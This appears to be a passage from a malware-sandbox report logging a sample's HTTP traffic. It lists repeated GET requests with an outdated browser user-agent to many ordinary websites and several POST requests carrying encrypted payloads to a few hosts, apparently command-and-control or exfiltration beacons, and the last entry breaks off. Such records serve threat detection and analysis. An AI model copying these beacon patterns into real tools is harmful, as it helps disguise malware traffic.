                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
                      Source: global trafficHTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 59 4f 61 72 32 2b 59 46 31 47 54 78 69 39 63 52 67 65 51 43 61 51 6d 30 74 76 33 47 43 51 57 79 65 70 41 5a 2b 4c 30 63 74 2f 73 2f 79 36 6d 47 69 45 68 50 6a 75 66 6d 54 33 4e 66 55 30 63 68 4b 30 63 70 57 70 51 50 32 79 4f 4b 53 4b 4f 55 4d 70 49 35 34 50 45 69 4f 4c 65 52 35 36 51 64 59 45 42 70 46 2b 32 68 6b 78 38 4e 4d 65 53 5a 70 64 37 57 30 4e 75 74 6f 37 58 68 2f 34 37 6f 58 61 4b 36 5a 4b 48 4d 68 74 59 6e 4f 66 65 47 72 62 45 4e 59 2b 63 61 69 6b 32 6d 4b 6d 33 47 5a 34 2b 30 49 32 79 62 37 6b 48 52 4f 69 37 33 68 78 4e 6c 62 69 53 77 45 50 63 39 55 37 5a 2b 57 6c 6f 70 33 6f 4a 62 35 6b 6b 79 31 71 67 59 63 4f 46 68 53 69 37 34 51 52 6a 38 51 6f 78 6f 4d 77 45 44 31 75 69 71 79 68 37 44 66 30 6a 68 56 72 66 69 34 57 76 36 41 34 61 73 41 61 72 46 4b 6f 42 58 43 38 66 78 61 56 74 7a 57 35 4b 6b 42 39 6b 6e 46 38 2f 49 56 4d 52 52 33 75 6e 50 67 2b 65 66 61 59 6d 7a 33 65 4a 78 38 59 46 54 57 79 68 4c 33 6a 47 75 57 71 74 65 68 75 4f 4b 50 45 4e 63 74 6a 33 74 78 78 55 66 78 61 57 4d 64 30 53 7a 54 61 65 6e 31 61 36 58 30 43 5a 49 6e 71 36 75 72 41 37 6e 62 2f 70 54 61 43 39 66 75 39 70 6d 2f 6d 57 57 6e 31 48 34 59 67 54 6f 4a 30 48 76 50 64 2b 6e 62 31 47 30 49 4e 6b 51 4f 5a 68 70 61 61 73 45 65 6b 4d 66 57 6a 31 69 43 4e 4b 74 52 79 62 34 52 6f 41 6c 6e 53 68 72 72 48 4f 6a 67 4d 35 76 42 39 38 36 65 45 4b 33 63 64 79 52 42 55 7a 72 54 4d 35 77 7a 67 45 77 32 50 75 74 38 46 45 73 67 54 44 64 6f 55 39 75 76 79 36 74 58 71 73 4c 44 47 78 57 51 73 50 30 76 76 56 47 41 4a 70 48 71 6a 55 42 36 76 65 75 46 61 4d 68 56 35 41 35 6e 4d 4f 55 30 42 50 54 54 31 6f 6f 2b 6a 44 36 36 34 72 67 6f 43 4b 52 4f 42 6e 41 31 2b 2b 2b 61 57 78 4a 62 41 3d 3d Data Ascii: YOar2+YF1GTxi9cRgeQCaQm0tv3GCQWyepAZ+L0ct/s/y6mGiEhPjufmT3NfU0chK0cpWpQP2yOKSKOUMpI54PEiOLeR56QdYEBpF+2hkx8NMeSZpd7W0Nuto7Xh/47oXaK6ZKHMhtYnOfeGrbENY+caik2mKm3GZ4+0I2yb7kHROi73hxNlbiSwEPc9U7Z+Wlop3oJb5kky1qgYcOFhSi74QRj8QoxoMwED1uiqyh7Df0jhVrfi4Wv6A4asAarFKoBXC8fxaVtzW5KkB9knF8/IVMRR3unPg+efaYmz3eJx8YFTWyhL3jGuWqtehuOKPENctj3txxUfxaWMd0SzTaen1a6X0CZInq6urA7nb/pTaC9fu9pm/mWWn1H4YgToJ0HvPd+nb1G0INkQOZhpaasEekMfWj1iCNKtRyb4RoAlnShrrHOjgM5vB986eEK3cdyRBUzrTM5wzgEw2Put8FEsgTDdoU9uvy6tXqsLDGxWQsP0vvVGAJpHqjUB6veuFaMhV5A5nMOU0BPTT1oo+jD664rgoCKROBnA1+++aWxJbA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 47 61 2b 63 46 79 37 34 31 57 52 37 57 62 44 34 4f 65 47 73 32 4a 47 46 30 53 6d 75 58 53 59 56 51 73 50 61 78 67 66 2b 65 48 70 45 30 55 37 37 64 44 50 70 45 30 2f 54 56 66 6f 49 74 43 57 55 75 43 72 55 77 72 4f 54 31 63 77 42 59 79 6a 46 42 45 50 36 35 51 63 38 4e 47 70 52 6f 42 7a 2f 77 57 5a 42 34 63 63 64 74 4f 72 54 2f 52 61 32 6b 53 65 4f 6f 58 53 33 4e 38 68 67 6a 41 5a 63 4a 68 38 47 76 42 48 50 54 49 79 53 52 4c 67 4b 64 46 6e 44 6d 37 32 33 6b 36 2b 6e 51 55 74 51 67 72 48 45 53 6a 32 52 63 6b 6d 43 54 39 46 4c 53 76 41 65 44 51 4e 69 6a 4d 48 6c 46 34 71 31 66 55 4c 4b 61 32 43 53 5a 54 53 6a 78 72 53 32 63 30 53 47 47 71 31 6b 50 61 32 75 5a 35 34 52 69 75 76 45 73 50 44 71 75 37 70 44 50 73 54 53 59 77 55 72 53 52 77 58 39 6d 54 47 79 65 4a 6a 31 2f 72 36 52 4e 37 37 55 31 32 6e 77 48 6e 34 4f 38 56 4e 41 31 50 2b 52 2f 36 4f 70 50 48 76 65 59 6f 78 32 53 6c 46 48 48 56 5a 37 66 55 45 55 6f 6d 58 4f 51 39 4d 50 64 37 66 7a 59 36 4d 64 67 2b 30 52 47 33 62 44 79 45 75 63 6c 4d 75 32 31 77 79 57 75 33 45 6d 61 31 2b 48 58 62 59 59 44 51 46 4a 37 6c 6b 4e 69 74 79 55 78 35 6d 2f 75 74 58 4a 48 6f 56 78 78 5a 50 46 2f 6c 74 7a 44 44 43 56 2f 42 78 4e 62 77 79 41 7a 33 6c 57 53 54 7a 75 70 54 65 48 2f 6c 65 34 32 72 31 6f 6f 61 4e 47 76 4c 44 6e 47 69 34 76 75 49 50 39 79 2b 67 56 63 79 37 72 57 6c 50 66 74 51 73 64 61 68 65 79 75 61 62 57 34 5a 32 6e 43 65 76 4d 34 69 56 67 54 33 65 42 59 46 48 73 57 71 4b 4b 2b 52 6e 43 36 43 70 4a 6c 31 6e 31 2b 4a 2b 45 64 51 46 57 35 70 48 62 6a 63 75 41 78 76 74 78 6c 37 72 48 2f 47 6a 31 79 46 76 43 79 2f 48 43 7a 48 79 36 67 64 6e 36 6a 61 46 47 77 3d 3d Data Ascii: Ga+cFy741WR7WbD4OeGs2JGF0SmuXSYVQsPaxgf+eHpE0U77dDPpE0/TVfoItCWUuCrUwrOT1cwBYyjFBEP65Qc8NGpRoBz/wWZB4ccdtOrT/Ra2kSeOoXS3N8hgjAZcJh8GvBHPTIySRLgKdFnDm723k6+nQUtQgrHESj2RckmCT9FLSvAeDQNijMHlF4q1fULKa2CSZTSjxrS2c0SGGq1kPa2uZ54RiuvEsPDqu7pDPsTSYwUrSRwX9mTGyeJj1/r6RN77U12nwHn4O8VNA1P+R/6OpPHveYox2SlFHHVZ7fUEUomXOQ9MPd7fzY6Mdg+0RG3bDyEuclMu21wyWu3Ema1+HXbYYDQFJ7lkNityUx5m/utXJHoVxxZPF/ltzDDCV/BxNbwyAz3lWSTzupTeH/le42r1ooaNGvLDnGi4vuIP9y+gVcy7rWlPftQsdaheyuabW4Z2nCevM4iVgT3eBYFHsWqKK+RnC6CpJl1n1+J+EdQFW5pHbjcuAxvtxl7rH/Gj1yFvCy/HCzHy6gdn6jaFGw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 31 33 78 51 58 57 7a 72 7a 32 53 68 6d 7a 30 43 56 2b 39 57 4d 48 39 68 7a 63 44 45 58 4d 2b 54 59 4c 73 34 64 43 70 36 37 38 6e 6e 79 41 4a 75 37 31 6c 57 76 48 34 45 4a 2b 63 68 72 53 4a 30 2f 37 54 46 4a 43 6f 4f 2b 66 42 49 58 68 67 4f 5a 77 31 7a 2f 68 63 71 72 6c 6e 72 75 59 63 58 78 39 2b 54 44 4d 63 39 35 68 76 42 64 6d 77 79 44 73 30 57 41 76 65 38 72 6f 50 49 34 33 70 45 68 38 52 57 33 4f 61 79 65 39 59 43 2b 55 4c 4e 6a 70 56 70 68 70 66 33 4e 66 4d 69 2b 44 4f 63 46 57 41 74 73 4a 2f 2b 35 6f 6e 44 31 4b 49 76 65 64 52 51 6f 65 71 6f 37 7a 43 72 56 34 59 68 62 36 78 46 37 38 5a 42 39 71 48 61 4e 42 74 53 62 41 77 56 4c 62 70 55 53 72 53 59 6f 30 46 48 4a 4f 39 43 4b 7a 6c 4e 38 73 42 43 6d 33 76 56 39 4b 39 75 70 34 67 30 2f 2b 6f 70 2f 6d 52 44 57 30 4e 51 37 36 79 46 4f 62 50 64 4b 49 44 63 4b 4b 76 74 64 73 37 57 48 65 4e 75 32 36 7a 78 57 73 6c 55 44 52 46 75 33 55 79 77 46 45 76 48 70 70 48 6e 51 46 33 62 59 4e 51 5a 76 59 74 66 49 6e 71 4e 73 52 7a 78 44 5a 2f 2b 37 79 6d 30 4e 65 45 75 43 74 30 49 6f 69 46 5a 55 70 6e 32 32 52 63 75 73 41 52 6c 58 52 55 49 6d 75 33 59 75 59 41 79 46 6b 71 35 30 6a 32 50 6a 4d 50 5a 52 68 75 61 68 4f 73 68 49 6f 37 2f 50 33 74 56 49 50 39 61 74 6c 69 72 76 78 72 36 44 58 58 2f 58 61 41 53 57 6c 35 4b 39 6b 39 71 47 53 43 4e 63 54 74 42 55 4e 6e 36 35 55 61 65 69 34 44 56 54 43 6a 33 73 61 65 61 47 43 33 71 30 41 4b 54 42 64 53 36 70 63 37 6c 7a 71 6a 73 4c 48 6a 30 4d 63 78 53 77 57 42 35 6a 34 69 42 35 69 53 47 42 49 30 34 6a 6a 7a 36 69 68 6d 6e 4e 67 49 53 4c 2f 6a 34 6d 57 64 2b 4c 6f 7a 6b 2b 48 66 53 4f 46 36 65 6b 62 4b 34 42 57 76 76 50 6a 6a 67 74 70 2b 6c 68 42 70 70 38 57 4c 56 5a 6e 74 38 2b 43 32 58 35 54 71 74 55 73 37 6e 44 56 71 38 75 6c 50 2f 73 4c 67 56 37 36 74 78 63 76 6c 46 5a 77 3d 3d Data Ascii: 13xQXWzrz2Shmz0CV+9WMH9hzcDEXM+TYLs4dCp678nnyAJu71lWvH4EJ+chrSJ0/7TFJCoO+fBIXhgOZw1z/hcqrlnruYcXx9+TDMc95hvBdmwyDs0WAve8roPI43pEh8RW3Oaye9YC+ULNjpVphpf3NfMi+DOcFWAtsJ/+5onD1KIvedRQoeqo7zCrV4Yhb6xF78ZB9qHaNBtSbAwVLbpUSrSYo0FHJO9CKzlN8sBCm3vV9K9up4g0/+op/mRDW0NQ76yFObPdKIDcKKvtds7WHeNu26zxWslUDRFu3UywFEvHppHnQF3bYNQZvYtfInqNsRzxDZ/+7ym0NeEuCt0IoiFZUpn22RcusARlXRUImu3YuYAyFkq50j2PjMPZRhuahOshIo7/P3tVIP9atlirvxr6DXX/XaASWl5K9k9qGSCNcTtBUNn65Uaei4DVTCj3saeaGC3q0AKTBdS6pc7lzqjsLHj0McxSwWB5j4iB5iSGBI04jjz6ihmnNgISL/j4mWd+Lozk+HfSOF6ekbK4BWvvPjjgtp+lhBpp8WLVZnt8+C2X5TqtUs7nDVq8ulP/sLgV76txcvlFZw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jenco.co.ukCache-Control: no-cacheData Raw: 57 78 42 46 76 6e 63 52 30 32 54 75 68 53 72 39 35 6b 43 37 4b 4d 42 32 39 54 4d 74 72 30 4d 54 6d 7a 79 48 71 2f 69 64 79 6d 6c 6a 46 45 46 4a 74 6c 6a 70 47 75 64 74 41 4d 45 58 2b 43 48 41 79 74 57 30 72 44 61 4c 42 30 38 63 71 6d 55 44 61 43 6a 72 58 2f 6f 7a 30 6d 58 46 55 74 4f 33 58 59 77 51 6e 6a 6a 36 53 38 39 55 6c 53 47 69 34 75 4b 7a 44 73 77 43 4a 45 72 47 31 6d 66 2b 75 30 49 37 43 57 51 49 63 54 66 54 4b 77 7a 66 61 49 79 4c 66 47 4d 34 57 52 4a 2b 53 42 63 2f 47 74 56 55 4d 43 42 44 61 63 41 45 59 50 57 46 59 51 37 36 6c 70 4a 33 48 69 52 59 48 71 36 30 53 64 63 43 68 73 48 53 59 7a 64 56 52 6b 4a 63 6f 68 75 62 65 6e 44 67 70 6a 36 6c 34 69 4c 42 69 38 37 68 38 37 35 47 2f 7a 30 58 4e 42 39 4a 6e 32 4b 53 2b 6c 2f 63 64 45 4b 6c 7a 44 48 72 2f 4c 51 62 51 4b 38 4d 4e 53 33 64 4a 71 66 65 42 6d 79 51 48 6e 52 72 75 48 37 6f 35 33 58 43 5a 53 64 78 36 66 4d 37 55 46 75 62 74 69 74 50 46 55 46 76 69 4b 59 2f 52 38 2f 6a 6c 34 49 6a 51 72 30 47 2b 32 36 53 68 7a 37 79 65 78 72 50 58 70 61 30 4a 6d 58 76 7a 6d 4f 52 68 35 6c 6b 65 69 38 4d 4f 74 49 59 44 57 76 50 4f 78 35 43 52 76 41 61 41 72 38 49 5a 46 4f 6c 72 46 54 6d 6c 78 58 6d 37 38 6d 34 7a 56 59 37 63 4a 5a 61 78 74 34 56 55 70 47 79 32 74 79 6a 30 34 39 74 2b 61 54 42 36 71 37 45 2b 4e 46 7a 72 7a 58 34 77 56 6e 46 65 44 42 39 37 6b 63 73 49 75 5a 6e 61 6d 32 74 67 79 36 42 70 44 47 2b 54 36 36 68 54 63 6e 4b 44 4a 57 4e 4c 32 77 6f 41 45 69 5a 7a 66 76 7a 4c 38 64 73 69 70 79 77 78 4b 7a 44 6d 41 49 42 38 2f 64 4b 6c 33 41 57 66 39 6d 76 4a 69 6f 4e 75 56 6b 49 52 53 70 42 76 6a 6a 46 33 7a 34 56 6e 34 6c 37 49 75 4b 4e 33 77 58 6b 64 59 67 51 51 2b 54 2f 6d 39 41 55 64 67 3d 3d Data Ascii: WxBFvncR02TuhSr95kC7KMB29TMtr0MTmzyHq/idymljFEFJtljpGudtAMEX+CHAytW0rDaLB08cqmUDaCjrX/oz0mXFUtO3XYwQnjj6S89UlSGi4uKzDswCJErG1mf+u0I7CWQIcTfTKwzfaIyLfGM4WRJ+SBc/GtVUMCBDacAEYPWFYQ76lpJ3HiRYHq60SdcChsHSYzdVRkJcohubenDgpj6l4iLBi87h875G/z0XNB9Jn2KS+l/cdEKlzDHr/LQbQK8MNS3dJqfeBmyQHnRruH7o53XCZSdx6fM7UFubtitPFUFviKY/R8/jl4IjQr0G+26Shz7yexrPXpa0JmXvzmORh5lkei8MOtIYDWvPOx5CRvAaAr8IZFOlrFTmlxXm78m4zVY7cJZaxt4VUpGy2tyj049t+aTB6q7E+NFzrzX4wVnFeDB97kcsIuZnam2tgy6BpDG+T66hTcnKDJWNL2woAEiZzfvzL8dsipywxKzDmAIB8/dKl3AWf9mvJioNuVkIRSpBvjjF3z4Vn4l7IuKN3wXkdYgQQ+T/m9AUdg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.olras.comCache-Control: no-cacheData Raw: 47 61 2b 63 46 79 37 34 31 57 52 37 57 62 44 34 4f 65 47 73 32 4a 47 46 30 53 6d 75 58 53 59 56 51 73 50 61 78 67 66 2b 65 48 70 45 30 55 37 37 64 44 50 70 45 30 2f 54 56 66 6f 49 74 43 57 55 75 43 72 55 77 72 4f 54 31 63 77 42 59 79 6a 46 42 45 50 36 35 51 63 38 4e 47 70 52 6f 42 7a 2f 77 57 5a 42 34 63 63 64 74 4f 72 54 2f 52 61 32 6b 53 65 4f 6f 58 53 33 4e 38 68 67 6a 41 5a 63 4a 68 38 47 76 42 48 50 54 49 79 53 52 4c 67 4b 64 46 6e 44 6d 37 32 33 6b 36 2b 6e 51 55 74 51 67 72 48 45 53 6a 32 52 63 6b 6d 43 54 39 46 4c 53 76 41 65 44 51 4e 69 6a 4d 48 6c 46 34 71 31 66 55 4c 4b 61 32 43 53 5a 54 53 6a 78 72 53 32 63 30 53 47 47 71 31 6b 50 61 32 75 5a 35 34 52 69 75 76 45 73 50 44 71 75 37 70 44 50 73 54 53 59 77 55 72 53 52 77 58 39 6d 54 47 79 65 4a 6a 31 2f 72 36 52 4e 37 37 55 31 32 6e 77 48 6e 34 4f 38 56 4e 41 31 50 2b 52 2f 36 4f 70 50 48 76 65 59 6f 78 32 53 6c 46 48 48 56 5a 37 66 55 45 55 6f 6d 58 4f 51 39 4d 50 64 37 66 7a 59 36 4d 64 67 2b 30 52 47 33 62 44 79 45 75 63 6c 4d 75 32 31 77 79 57 75 33 45 6d 61 31 2b 48 58 62 59 59 44 51 46 4a 37 6c 6b 4e 69 74 79 55 78 35 6d 2f 75 74 58 4a 48 6f 56 78 78 5a 50 46 2f 6c 74 7a 44 44 43 56 2f 42 78 4e 62 77 79 41 7a 33 6c 57 53 54 7a 75 70 54 65 48 2f 6c 65 34 32 72 31 6f 6f 61 4e 47 76 4c 44 6e 47 69 34 76 75 49 50 39 79 2b 67 56 63 79 37 72 57 6c 50 66 74 51 73 64 61 68 65 79 75 61 62 57 34 5a 32 6e 43 65 76 4d 34 69 56 67 54 33 65 42 59 46 48 73 57 71 4b 4b 2b 52 6e 43 36 43 70 4a 6c 31 6e 31 2b 4a 2b 45 64 51 46 57 35 70 48 62 6a 63 75 41 78 76 74 78 6c 37 72 48 2f 47 6a 31 79 46 76 43 79 2f 48 43 7a 48 79 36 67 64 6e 36 6a 61 46 47 77 3d 3d Data Ascii: Ga+cFy741WR7WbD4OeGs2JGF0SmuXSYVQsPaxgf+eHpE0U77dDPpE0/TVfoItCWUuCrUwrOT1cwBYyjFBEP65Qc8NGpRoBz/wWZB4ccdtOrT/Ra2kSeOoXS3N8hgjAZcJh8GvBHPTIySRLgKdFnDm723k6+nQUtQgrHESj2RckmCT9FLSvAeDQNijMHlF4q1fULKa2CSZTSjxrS2c0SGGq1kPa2uZ54RiuvEsPDqu7pDPsTSYwUrSRwX9mTGyeJj1/r6RN77U12nwHn4O8VNA1P+R/6OpPHveYox2SlFHHVZ7fUEUomXOQ9MPd7fzY6Mdg+0RG3bDyEuclMu21wyWu3Ema1+HXbYYDQFJ7lkNityUx5m/utXJHoVxxZPF/ltzDDCV/BxNbwyAz3lWSTzupTeH/le42r1ooaNGvLDnGi4vuIP9y+gVcy7rWlPftQsdaheyuabW4Z2nCevM4iVgT3eBYFHsWqKK+RnC6CpJl1n1+J+EdQFW5pHbjcuAxvtxl7rH/Gj1yFvCy/HCzHy6gdn6jaFGw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dgmna.comCache-Control: no-cacheData Raw: 31 33 78 51 58 57 7a 72 7a 32 53 68 6d 7a 30 43 56 2b 39 57 4d 48 39 68 7a 63 44 45 58 4d 2b 54 59 4c 73 34 64 43 70 36 37 38 6e 6e 79 41 4a 75 37 31 6c 57 76 48 34 45 4a 2b 63 68 72 53 4a 30 2f 37 54 46 4a 43 6f 4f 2b 66 42 49 58 68 67 4f 5a 77 31 7a 2f 68 63 71 72 6c 6e 72 75 59 63 58 78 39 2b 54 44 4d 63 39 35 68 76 42 64 6d 77 79 44 73 30 57 41 76 65 38 72 6f 50 49 34 33 70 45 68 38 52 57 33 4f 61 79 65 39 59 43 2b 55 4c 4e 6a 70 56 70 68 70 66 33 4e 66 4d 69 2b 44 4f 63 46 57 41 74 73 4a 2f 2b 35 6f 6e 44 31 4b 49 76 65 64 52 51 6f 65 71 6f 37 7a 43 72 56 34 59 68 62 36 78 46 37 38 5a 42 39 71 48 61 4e 42 74 53 62 41 77 56 4c 62 70 55 53 72 53 59 6f 30 46 48 4a 4f 39 43 4b 7a 6c 4e 38 73 42 43 6d 33 76 56 39 4b 39 75 70 34 67 30 2f 2b 6f 70 2f 6d 52 44 57 30 4e 51 37 36 79 46 4f 62 50 64 4b 49 44 63 4b 4b 76 74 64 73 37 57 48 65 4e 75 32 36 7a 78 57 73 6c 55 44 52 46 75 33 55 79 77 46 45 76 48 70 70 48 6e 51 46 33 62 59 4e 51 5a 76 59 74 66 49 6e 71 4e 73 52 7a 78 44 5a 2f 2b 37 79 6d 30 4e 65 45 75 43 74 30 49 6f 69 46 5a 55 70 6e 32 32 52 63 75 73 41 52 6c 58 52 55 49 6d 75 33 59 75 59 41 79 46 6b 71 35 30 6a 32 50 6a 4d 50 5a 52 68 75 61 68 4f 73 68 49 6f 37 2f 50 33 74 56 49 50 39 61 74 6c 69 72 76 78 72 36 44 58 58 2f 58 61 41 53 57 6c 35 4b 39 6b 39 71 47 53 43 4e 63 54 74 42 55 4e 6e 36 35 55 61 65 69 34 44 56 54 43 6a 33 73 61 65 61 47 43 33 71 30 41 4b 54 42 64 53 36 70 63 37 6c 7a 71 6a 73 4c 48 6a 30 4d 63 78 53 77 57 42 35 6a 34 69 42 35 69 53 47 42 49 30 34 6a 6a 7a 36 69 68 6d 6e 4e 67 49 53 4c 2f 6a 34 6d 57 64 2b 4c 6f 7a 6b 2b 48 66 53 4f 46 36 65 6b 62 4b 34 42 57 76 76 50 6a 6a 67 74 70 2b 6c 68 42 70 70 38 57 4c 56 5a 6e 74 38 2b 43 32 58 35 54 71 74 55 73 37 6e 44 56 71 38 75 6c 50 2f 73 4c 67 56 37 36 74 78 63 76 6c 46 5a 77 3d 3d Data Ascii: 